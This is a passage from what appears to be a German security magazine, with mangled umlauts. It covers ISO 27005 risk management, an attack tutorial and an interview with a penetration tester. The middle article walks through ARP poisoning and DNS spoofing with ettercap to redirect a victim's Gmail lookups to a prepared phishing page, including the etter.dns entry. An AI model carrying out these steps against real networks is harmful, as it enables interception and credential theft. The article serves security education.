Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
